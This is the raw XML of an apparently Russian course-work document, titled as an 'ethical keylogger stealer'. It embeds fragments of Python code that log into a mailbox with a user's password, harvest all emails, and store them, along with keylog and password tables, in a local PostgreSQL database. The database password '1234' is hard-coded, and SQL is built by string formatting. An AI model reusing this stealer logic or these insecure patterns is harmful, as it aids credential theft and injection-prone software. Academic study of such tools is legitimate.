      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        password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.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        identifier = </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"EHP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not </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="CC7832"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or not </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password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Пожалуйста</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t>заполн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r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">email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get_all_emails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emails </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="CC7832"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is Non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ход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овы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ящик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Проверь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авильнос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логи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ароля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ave_emails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(emails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content 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data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(conten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72737A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">content </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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ы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    lines = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file.readlin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897BB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0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    data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) (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data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(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72737A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>what_done</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="72737A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error"</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759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+= 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никаль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Количеств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ок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        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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lastRenderedPageBreak/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_label.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Ошибка при вставке данных в базу данных. Все данные уже представлены в БД и не могут быть вставлены повторно.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connect_to_databas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psycopg2.connect(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user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ostgre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1234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hos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localhost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or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5432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databas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EHP_Project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connection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дклю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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="FFC66D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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keylog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r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"password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password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assword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дготовк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тав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6E68B0">
        <w:rPr>
          <w:color w:val="808080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query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SERT INTO {} (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mail_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>date_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, {}) VALUES (%s, %s, %s)"</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).format(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quer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True</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="CC7832"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        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rollback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  <w:t xml:space="preserve">        finall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ursor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all_table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SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'public'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table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table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tabl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SELECT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> *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row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 xml:space="preserve"> = [desc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esc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ursor.description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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conten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cols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_y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minimum_height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table_layout.setter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'height'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зва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ов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ame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name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bol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row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s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valu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:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    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valu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Таблица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content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8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8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delete_popup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rows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отображ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delete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rows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 xml:space="preserve">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дал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            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5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5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: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erform_dele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input_value.text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perform_dele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opup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DELETE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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WHERE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value</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="CC7832"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,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Стро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dismis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спех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s not None and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__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"__main__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).run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFF478" w14:textId="77777777" w:rsidR="00733078" w:rsidRPr="00733078" w:rsidRDefault="00733078" w:rsidP="00733078">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00733078" w:rsidRPr="00733078" w:rsidSect="000842B6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C34F" w14:textId="77777777" w:rsidR="000A2A77" w:rsidRDefault="000A2A77" w:rsidP="00BC1D00">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37507523" w14:textId="77777777" w:rsidR="000A2A77" w:rsidRDefault="000A2A77" w:rsidP="00BC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CA5F" w14:textId="51B4EA44" w:rsidR="00511776" w:rsidRDefault="00511776" w:rsidP="009C2938">
    <w:pPr>
      <w:pStyle w:val="a6"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="5BF48C6E" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="005117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5018"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="3291B75C" w14:textId="39B33F6D" w:rsidR="00511776" w:rsidRDefault="00511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14FB" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511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99101" w14:textId="77777777" w:rsidR="000A2A77" w:rsidRDefault="000A2A77" w:rsidP="00BC1D00">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E8107BA" w14:textId="77777777" w:rsidR="000A2A77" w:rsidRDefault="000A2A77" w:rsidP="00BC1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4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B58CFB4"/>
    <w:lvl w:ilvl="0" w:tplc="BAFA8D00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25C51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6308156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01F0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="629A0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6261"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4925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A0C5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0AA8103A"/>
    <w:lvl w:ilvl="0" w:tplc="0420A8A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1412" w:hanging="703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14F10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8A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E1B34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87D8F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177AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="344495FA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0AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8EA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50E3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C588C9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51006FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11C2B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D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21105"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEA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B7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BF80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56460D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0B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D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4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21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F0"/>
    <w:rsid w:val="00003726"/>
    <w:rsid w:val="00005435"/>
    <w:rsid w:val="00005A83"/>
    <w:rsid w:val="000123F8"/>
    <w:rsid w:val="000136B2"/>
    <w:rsid w:val="00020184"/>
    <w:rsid w:val="00047144"/>
    <w:rsid w:val="000612A0"/>
    <w:rsid w:val="00066491"/>
    <w:rsid w:val="0006782B"/>
    <w:rsid w:val="000700A2"/>
    <w:rsid w:val="00071674"/>
    <w:rsid w:val="00073ECB"/>
    <w:rsid w:val="000806AE"/>
    <w:rsid w:val="000842B6"/>
    <w:rsid w:val="000860CE"/>
    <w:rsid w:val="000919D5"/>
    <w:rsid w:val="00092E80"/>
    <w:rsid w:val="000A2A77"/>
    <w:rsid w:val="000A338A"/>
    <w:rsid w:val="000A6B57"/>
    <w:rsid w:val="000B5E30"/>
    <w:rsid w:val="000C2E7D"/>
    <w:rsid w:val="000D7D47"/>
    <w:rsid w:val="000E0008"/>
    <w:rsid w:val="000F1BA3"/>
    <w:rsid w:val="001106F3"/>
    <w:rsid w:val="0013581D"/>
    <w:rsid w:val="00152FFD"/>
    <w:rsid w:val="00154009"/>
    <w:rsid w:val="0015575C"/>
    <w:rsid w:val="00167575"/>
    <w:rsid w:val="001A0267"/>
    <w:rsid w:val="001A195A"/>
    <w:rsid w:val="001A1C24"/>
    <w:rsid w:val="001B0A15"/>
    <w:rsid w:val="001C3888"/>
    <w:rsid w:val="001C6AE0"/>
    <w:rsid w:val="001D6542"/>
    <w:rsid w:val="001E0F0C"/>
    <w:rsid w:val="001E4D3A"/>
    <w:rsid w:val="001F1B5A"/>
    <w:rsid w:val="00203D29"/>
    <w:rsid w:val="00203E6C"/>
    <w:rsid w:val="0020419B"/>
    <w:rsid w:val="00207775"/>
    <w:rsid w:val="002104DC"/>
    <w:rsid w:val="00211B9E"/>
    <w:rsid w:val="002122EC"/>
    <w:rsid w:val="002171D5"/>
    <w:rsid w:val="0023285F"/>
    <w:rsid w:val="00261E23"/>
    <w:rsid w:val="002726EB"/>
    <w:rsid w:val="00291864"/>
    <w:rsid w:val="002A4D09"/>
    <w:rsid w:val="002B621D"/>
    <w:rsid w:val="002C55A3"/>
    <w:rsid w:val="002D04FD"/>
    <w:rsid w:val="002D27A9"/>
    <w:rsid w:val="002E3A86"/>
    <w:rsid w:val="002E4CCE"/>
    <w:rsid w:val="002E5EF4"/>
    <w:rsid w:val="002F23BA"/>
    <w:rsid w:val="00301395"/>
    <w:rsid w:val="00303942"/>
    <w:rsid w:val="00310A54"/>
    <w:rsid w:val="00314DD1"/>
    <w:rsid w:val="003163D0"/>
    <w:rsid w:val="00323E6F"/>
    <w:rsid w:val="00326F6F"/>
    <w:rsid w:val="0033738A"/>
    <w:rsid w:val="003472B2"/>
    <w:rsid w:val="00347D26"/>
    <w:rsid w:val="003528E7"/>
    <w:rsid w:val="00352BCD"/>
    <w:rsid w:val="00367FBB"/>
    <w:rsid w:val="00371D94"/>
    <w:rsid w:val="0037349D"/>
    <w:rsid w:val="0037428E"/>
    <w:rsid w:val="00376C95"/>
    <w:rsid w:val="00384BD5"/>
    <w:rsid w:val="00384F39"/>
    <w:rsid w:val="003A1212"/>
    <w:rsid w:val="003A26FA"/>
    <w:rsid w:val="003C5A5C"/>
    <w:rsid w:val="003D1349"/>
    <w:rsid w:val="003D5EDB"/>
    <w:rsid w:val="003D6799"/>
    <w:rsid w:val="003D73EF"/>
    <w:rsid w:val="003E5C4F"/>
    <w:rsid w:val="003F613D"/>
    <w:rsid w:val="004007CB"/>
    <w:rsid w:val="00415287"/>
    <w:rsid w:val="00417C36"/>
    <w:rsid w:val="00423452"/>
    <w:rsid w:val="0042460A"/>
    <w:rsid w:val="00425D85"/>
    <w:rsid w:val="00462357"/>
    <w:rsid w:val="00462B9C"/>
    <w:rsid w:val="00467DD2"/>
    <w:rsid w:val="00470F40"/>
    <w:rsid w:val="004814D9"/>
    <w:rsid w:val="00492947"/>
    <w:rsid w:val="0049469D"/>
    <w:rsid w:val="004952E2"/>
    <w:rsid w:val="004A5EC3"/>
    <w:rsid w:val="004B1E87"/>
    <w:rsid w:val="004B2070"/>
    <w:rsid w:val="004D200D"/>
    <w:rsid w:val="004D4714"/>
    <w:rsid w:val="004D59A2"/>
    <w:rsid w:val="004E1B90"/>
    <w:rsid w:val="004E505B"/>
    <w:rsid w:val="004F54A8"/>
    <w:rsid w:val="0050052E"/>
    <w:rsid w:val="00501655"/>
    <w:rsid w:val="005035EF"/>
    <w:rsid w:val="00507996"/>
    <w:rsid w:val="00510CCC"/>
    <w:rsid w:val="00511776"/>
    <w:rsid w:val="00520691"/>
    <w:rsid w:val="00522ECD"/>
    <w:rsid w:val="00523953"/>
    <w:rsid w:val="00524EF5"/>
    <w:rsid w:val="00544EA5"/>
    <w:rsid w:val="00551DEC"/>
    <w:rsid w:val="00556F33"/>
    <w:rsid w:val="00562A50"/>
    <w:rsid w:val="00563166"/>
    <w:rsid w:val="00567C70"/>
    <w:rsid w:val="005728A2"/>
    <w:rsid w:val="0057382C"/>
    <w:rsid w:val="00573C07"/>
    <w:rsid w:val="00573C63"/>
    <w:rsid w:val="005744F4"/>
    <w:rsid w:val="0057457F"/>
    <w:rsid w:val="00581628"/>
    <w:rsid w:val="0058464E"/>
    <w:rsid w:val="005858C2"/>
    <w:rsid w:val="00594160"/>
    <w:rsid w:val="005A25C7"/>
    <w:rsid w:val="005A269C"/>
    <w:rsid w:val="005C79E4"/>
    <w:rsid w:val="005D1538"/>
    <w:rsid w:val="005D18E2"/>
    <w:rsid w:val="005E0339"/>
    <w:rsid w:val="005E342D"/>
    <w:rsid w:val="005F13A5"/>
    <w:rsid w:val="00602ADE"/>
    <w:rsid w:val="006040E1"/>
    <w:rsid w:val="00605BA0"/>
    <w:rsid w:val="00621F6B"/>
    <w:rsid w:val="00632FF9"/>
    <w:rsid w:val="006331F4"/>
    <w:rsid w:val="00636699"/>
    <w:rsid w:val="00652871"/>
    <w:rsid w:val="006616A7"/>
    <w:rsid w:val="00670B98"/>
    <w:rsid w:val="00672333"/>
    <w:rsid w:val="00674AF2"/>
    <w:rsid w:val="00674F5C"/>
    <w:rsid w:val="006875BD"/>
    <w:rsid w:val="006B0E40"/>
    <w:rsid w:val="006C0B6F"/>
    <w:rsid w:val="006C14BB"/>
    <w:rsid w:val="006D05F1"/>
    <w:rsid w:val="006E407B"/>
    <w:rsid w:val="006E4669"/>
    <w:rsid w:val="006E68B0"/>
    <w:rsid w:val="007001A9"/>
    <w:rsid w:val="00701A9A"/>
    <w:rsid w:val="00704F5A"/>
    <w:rsid w:val="00722BAA"/>
    <w:rsid w:val="00723697"/>
    <w:rsid w:val="00733078"/>
    <w:rsid w:val="00754CDC"/>
    <w:rsid w:val="007650E6"/>
    <w:rsid w:val="007804EC"/>
    <w:rsid w:val="00780BD6"/>
    <w:rsid w:val="007B1DD4"/>
    <w:rsid w:val="007C1C4E"/>
    <w:rsid w:val="007D5539"/>
    <w:rsid w:val="007E3853"/>
    <w:rsid w:val="00804545"/>
    <w:rsid w:val="00812804"/>
    <w:rsid w:val="0081280A"/>
    <w:rsid w:val="00813F37"/>
    <w:rsid w:val="008268DA"/>
    <w:rsid w:val="00835546"/>
    <w:rsid w:val="00835582"/>
    <w:rsid w:val="008417F2"/>
    <w:rsid w:val="00845D81"/>
    <w:rsid w:val="0085491D"/>
    <w:rsid w:val="00881BBB"/>
    <w:rsid w:val="00884124"/>
    <w:rsid w:val="00884213"/>
    <w:rsid w:val="00896401"/>
    <w:rsid w:val="008A396A"/>
    <w:rsid w:val="008B2BDE"/>
    <w:rsid w:val="008B5B04"/>
    <w:rsid w:val="008D3A53"/>
    <w:rsid w:val="008D5616"/>
    <w:rsid w:val="008E4014"/>
    <w:rsid w:val="008E5CFC"/>
    <w:rsid w:val="008F1CD3"/>
    <w:rsid w:val="0091337F"/>
    <w:rsid w:val="00915BC3"/>
    <w:rsid w:val="00921CEE"/>
    <w:rsid w:val="00922CC9"/>
    <w:rsid w:val="009233EF"/>
    <w:rsid w:val="0093308C"/>
    <w:rsid w:val="00934631"/>
    <w:rsid w:val="00944FCC"/>
    <w:rsid w:val="00946FBA"/>
    <w:rsid w:val="009526D8"/>
    <w:rsid w:val="00956F40"/>
    <w:rsid w:val="00957E92"/>
    <w:rsid w:val="00960B00"/>
    <w:rsid w:val="00972BBB"/>
    <w:rsid w:val="009755A7"/>
    <w:rsid w:val="009842D0"/>
    <w:rsid w:val="009958DE"/>
    <w:rsid w:val="009A03FF"/>
    <w:rsid w:val="009A188B"/>
    <w:rsid w:val="009A4F42"/>
    <w:rsid w:val="009B1191"/>
    <w:rsid w:val="009B216E"/>
    <w:rsid w:val="009B776F"/>
    <w:rsid w:val="009C2938"/>
    <w:rsid w:val="009D508B"/>
    <w:rsid w:val="009F77CA"/>
    <w:rsid w:val="00A13F95"/>
    <w:rsid w:val="00A42CF5"/>
    <w:rsid w:val="00A5423B"/>
    <w:rsid w:val="00A57299"/>
    <w:rsid w:val="00A57AB5"/>
    <w:rsid w:val="00A637D8"/>
    <w:rsid w:val="00A77832"/>
    <w:rsid w:val="00A80C30"/>
    <w:rsid w:val="00A826F8"/>
    <w:rsid w:val="00A83E79"/>
    <w:rsid w:val="00A9072E"/>
    <w:rsid w:val="00A92BA6"/>
    <w:rsid w:val="00A94518"/>
    <w:rsid w:val="00AA00F9"/>
    <w:rsid w:val="00AB0F88"/>
    <w:rsid w:val="00AB39B5"/>
    <w:rsid w:val="00AB48D3"/>
    <w:rsid w:val="00AC0F76"/>
    <w:rsid w:val="00AD005E"/>
    <w:rsid w:val="00AD4C8F"/>
    <w:rsid w:val="00AD60C5"/>
    <w:rsid w:val="00AD75A1"/>
    <w:rsid w:val="00AF0B60"/>
    <w:rsid w:val="00B103E8"/>
    <w:rsid w:val="00B10896"/>
    <w:rsid w:val="00B10AC1"/>
    <w:rsid w:val="00B16867"/>
    <w:rsid w:val="00B179AB"/>
    <w:rsid w:val="00B17D9F"/>
    <w:rsid w:val="00B5103B"/>
    <w:rsid w:val="00B535A7"/>
    <w:rsid w:val="00B57A30"/>
    <w:rsid w:val="00B63E63"/>
    <w:rsid w:val="00B655FF"/>
    <w:rsid w:val="00B7139E"/>
    <w:rsid w:val="00B72D6E"/>
    <w:rsid w:val="00B91E0D"/>
    <w:rsid w:val="00B93D6E"/>
    <w:rsid w:val="00B94CF7"/>
    <w:rsid w:val="00B951F6"/>
    <w:rsid w:val="00B96279"/>
    <w:rsid w:val="00BB2E7A"/>
    <w:rsid w:val="00BB34DF"/>
    <w:rsid w:val="00BB682B"/>
    <w:rsid w:val="00BC1D00"/>
    <w:rsid w:val="00BC5A6D"/>
    <w:rsid w:val="00BD2D20"/>
    <w:rsid w:val="00C02F86"/>
    <w:rsid w:val="00C06660"/>
    <w:rsid w:val="00C123F8"/>
    <w:rsid w:val="00C2264D"/>
    <w:rsid w:val="00C35CFB"/>
    <w:rsid w:val="00C373C9"/>
    <w:rsid w:val="00C37E49"/>
    <w:rsid w:val="00C42FE4"/>
    <w:rsid w:val="00C4772E"/>
    <w:rsid w:val="00C53421"/>
    <w:rsid w:val="00C56308"/>
    <w:rsid w:val="00C65025"/>
    <w:rsid w:val="00C77320"/>
    <w:rsid w:val="00C80983"/>
    <w:rsid w:val="00C844A8"/>
    <w:rsid w:val="00C913B6"/>
    <w:rsid w:val="00C921ED"/>
    <w:rsid w:val="00C97415"/>
    <w:rsid w:val="00CA1927"/>
    <w:rsid w:val="00CA23CD"/>
    <w:rsid w:val="00CA3FD7"/>
    <w:rsid w:val="00CB634F"/>
    <w:rsid w:val="00CC51D1"/>
    <w:rsid w:val="00CE46DE"/>
    <w:rsid w:val="00D02CA7"/>
    <w:rsid w:val="00D105E5"/>
    <w:rsid w:val="00D1621C"/>
    <w:rsid w:val="00D2259E"/>
    <w:rsid w:val="00D23AFA"/>
    <w:rsid w:val="00D24141"/>
    <w:rsid w:val="00D343C4"/>
    <w:rsid w:val="00D41BCE"/>
    <w:rsid w:val="00D524BE"/>
    <w:rsid w:val="00D6089C"/>
    <w:rsid w:val="00D61985"/>
    <w:rsid w:val="00D66CB7"/>
    <w:rsid w:val="00D72935"/>
    <w:rsid w:val="00D94EDE"/>
    <w:rsid w:val="00D957BB"/>
    <w:rsid w:val="00D959D5"/>
    <w:rsid w:val="00D967AC"/>
    <w:rsid w:val="00DA006D"/>
    <w:rsid w:val="00DA15FE"/>
    <w:rsid w:val="00DC5EFF"/>
    <w:rsid w:val="00DD3E80"/>
    <w:rsid w:val="00DD4B0C"/>
    <w:rsid w:val="00DE2B9A"/>
    <w:rsid w:val="00DF303D"/>
    <w:rsid w:val="00E00767"/>
    <w:rsid w:val="00E00B02"/>
    <w:rsid w:val="00E017C6"/>
    <w:rsid w:val="00E0348E"/>
    <w:rsid w:val="00E230A9"/>
    <w:rsid w:val="00E265A4"/>
    <w:rsid w:val="00E33983"/>
    <w:rsid w:val="00E351C2"/>
    <w:rsid w:val="00E4166D"/>
    <w:rsid w:val="00E74150"/>
    <w:rsid w:val="00E76F07"/>
    <w:rsid w:val="00E81606"/>
    <w:rsid w:val="00E841D2"/>
    <w:rsid w:val="00E87121"/>
    <w:rsid w:val="00EA6ADD"/>
    <w:rsid w:val="00EB2683"/>
    <w:rsid w:val="00EB2BFC"/>
    <w:rsid w:val="00ED1BD1"/>
    <w:rsid w:val="00ED3FA1"/>
    <w:rsid w:val="00EE12B8"/>
    <w:rsid w:val="00EE681B"/>
    <w:rsid w:val="00EF1CF0"/>
    <w:rsid w:val="00F1280D"/>
    <w:rsid w:val="00F37249"/>
    <w:rsid w:val="00F41B8E"/>
    <w:rsid w:val="00F431EF"/>
    <w:rsid w:val="00F43689"/>
    <w:rsid w:val="00F46E95"/>
    <w:rsid w:val="00F472C2"/>
    <w:rsid w:val="00F5444B"/>
    <w:rsid w:val="00F637D3"/>
    <w:rsid w:val="00F700E2"/>
    <w:rsid w:val="00F76434"/>
    <w:rsid w:val="00F77DE1"/>
    <w:rsid w:val="00F85FCE"/>
    <w:rsid w:val="00F8666F"/>
    <w:rsid w:val="00F91DB3"/>
    <w:rsid w:val="00F92270"/>
    <w:rsid w:val="00F96BB4"/>
    <w:rsid w:val="00FA1DE5"/>
    <w:rsid w:val="00FC1C35"/>
    <w:rsid w:val="00FC3BB4"/>
    <w:rsid w:val="00FC53F2"/>
    <w:rsid w:val="00FC5BF5"/>
    <w:rsid w:val="00FC67C4"/>
    <w:rsid w:val="00FE36C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3FE5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{036F617E-E940-4870-A9AC-40B885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5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669"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:spacing w:before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7C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7C6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2122E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46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17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7C6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76F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D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D0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C1D0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C1D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3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729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0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ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/&#1056;&#1091;&#1082;&#1086;&#1074;&#1086;&#1076;&#1080;&#1090;&#1077;&#1083;&#1100;/&#1060;&#1091;&#1085;&#1082;&#1094;&#1080;&#1086;&#1085;&#1072;&#1083;&#1100;&#1085;&#1072;&#1103;%20&#1076;&#1080;&#1072;&#1075;&#1088;&#1072;&#1084;&#1084;&#1072;%20&#1087;&#1088;&#1086;&#1076;&#1091;&#1082;&#1090;&#1072;%20&#1082;&#1072;&#1082;%20&#1086;&#1085;%20&#1074